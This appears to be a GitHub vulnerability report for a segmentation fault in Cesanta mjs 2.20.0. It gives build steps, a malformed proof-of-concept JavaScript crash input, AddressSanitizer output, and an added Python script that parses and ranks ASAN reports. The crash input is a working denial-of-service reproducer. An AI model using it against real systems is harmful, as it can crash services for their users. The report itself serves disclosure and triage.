
SEGV (/mjs/mjs+0x4ec508) #252

Open
@vorfreuder

Description


The name of an affected Product
mjs

The affected version
Commit: b1b6eac (Tag: 2.20.0)

Description
An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs+0x4ec508 component.

Vulnerability Type
segmentation violation

Environment

  • Operating System
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.6 LTS
Release:        18.04
Codename:       bionic
  • Compiler
Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix

Steps to Reproduce

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -fsanitize=address -DMJS_MAIN mjs.c -o mjs
poc
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;

for (i = 8; i < 20; i++) {
  a let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify-= i;
c /= 0, c = 0let s = '08888888888888    true, "x": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify(o)AAA

run command

mjs -f poc

ASAN info

AddressSanitizer:DEADLYSIGNAL
=================================================================
==139==ERROR: AddressSanitizer: SEGV on unknown address 0x0000004ec508 (pc 0x0000004ec508 bp 0x7ffe0c9ce3d0 sp 0x7ffe0c9cdb58 T0)
==139==The signal is caused by a WRITE memory access.
    #0 0x4ec508  (/mjs/mjs+0x4ec508)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/mjs/mjs+0x4ec508) 
==139==ABORTING
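The ASAN output above is unsymbolized and reports a WRITE fault whose address equals the program counter, which is a different triage case from the usual near-null dereference. The following script is an added example (not code from the reporter or from the mjs project) that parses an AddressSanitizer DEADLYSIGNAL report, pulls out the signal kind, faulting address, pc, access type and stack frames, and ranks the crash for follow-up. The first sample is the report quoted in this issue, embedded inline; the second sample, `example_function` in `example.c`, is a constructed near-null read that shows the other branch of the heuristics. Helper names (`parse_asan_report`, `triage`) are this example's own.

```python
import re

# Constructed sample 1: the AddressSanitizer report from the issue above, embedded
# inline so the script runs offline.
ISSUE_REPORT = """\
AddressSanitizer:DEADLYSIGNAL
=================================================================
==139==ERROR: AddressSanitizer: SEGV on unknown address 0x0000004ec508 (pc 0x0000004ec508 bp 0x7ffe0c9ce3d0 sp 0x7ffe0c9cdb58 T0)
==139==The signal is caused by a WRITE memory access.
    #0 0x4ec508  (/mjs/mjs+0x4ec508)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/mjs/mjs+0x4ec508)
==139==ABORTING
"""

# Constructed sample 2 (hypothetical, not from the issue): a symbolized near-null read.
NULL_READ_REPORT = """\
==7==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x00000040123a bp 0x7ffd00000100 sp 0x7ffd00000080 T0)
==7==The signal is caused by a READ memory access.
==7==Hint: address points to the zero page.
    #0 0x40123a in example_function example.c:10
SUMMARY: AddressSanitizer: SEGV example.c:10 in example_function
"""

ERROR_RE = re.compile(
    r"==(?P<pid>\d+)==ERROR: AddressSanitizer: (?P<kind>[A-Za-z-]+) on (?:unknown )?address "
    r"(?P<addr>0x[0-9a-fA-F]+) \(pc (?P<pc>0x[0-9a-fA-F]+) bp (?P<bp>0x[0-9a-fA-F]+) sp (?P<sp>0x[0-9a-fA-F]+)"
)
ACCESS_RE = re.compile(r"The signal is caused by a (?P<access>READ|WRITE|UNKNOWN) memory access")
FRAME_RE = re.compile(r"^\s*#(?P<n>\d+) (?P<pc>0x[0-9a-fA-F]+)\s+(?P<where>.+?)\s*$", re.M)


def parse_asan_report(text):
    """Extract the crash facts from an ASAN DEADLYSIGNAL report; None if no report is present."""
    m = ERROR_RE.search(text)
    if m is None:
        return None
    a = ACCESS_RE.search(text)
    frames = [
        {
            "n": int(f.group("n")),
            "pc": int(f.group("pc"), 16),
            "where": f.group("where"),
            # ASAN prints "in <symbol> <file>:<line>" only when symbols are available;
            # an unsymbolized frame shows just "(<module>+<offset>)".
            "symbolized": f.group("where").startswith("in "),
        }
        for f in FRAME_RE.finditer(text)
    ]
    return {
        "pid": int(m.group("pid")),
        "kind": m.group("kind"),
        "addr": int(m.group("addr"), 16),
        "pc": int(m.group("pc"), 16),
        "access": a.group("access") if a else "UNKNOWN",
        "frames": frames,
    }


def triage(info):
    """Rank the crash for follow-up. These are heuristics, not a verdict on exploitability."""
    reasons = []
    priority = "medium"
    if info["addr"] < 0x1000:
        reasons.append("near-null address: NULL or small-offset dereference, usually a plain DoS")
        priority = "low"
    if info["addr"] == info["pc"]:
        reasons.append("fault address equals pc: execution reached the faulting address, "
                       "a control-flow anomaly rather than an ordinary data pointer")
        priority = "high"
    if info["access"] == "WRITE":
        reasons.append("write access: memory is being modified, not just read")
        priority = "high"
    if info["frames"] and not any(f["symbolized"] for f in info["frames"]):
        reasons.append("stack is unsymbolized: rebuild with -g (or run addr2line on the "
                       "module+offset) before assigning the crash to a code location")
    return {"priority": priority, "reasons": reasons}


if __name__ == "__main__":
    for name, report in (("issue", ISSUE_REPORT), ("null-read", NULL_READ_REPORT)):
        info = parse_asan_report(report)
        result = triage(info)
        print(f"{name}: {info['kind']} {info['access']} at {info['addr']:#x} -> {result['priority']}")
        for reason in result["reasons"]:
            print("  -", reason)
```

Run it over a saved ASAN log to get a first-pass ranking; for this issue it flags the report as high priority because the fault is a WRITE at the pc, and notes that the build was done without `-g`, so the `/mjs/mjs+0x4ec508` offset still has to be mapped to a source line before the crash can be assigned to a function.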
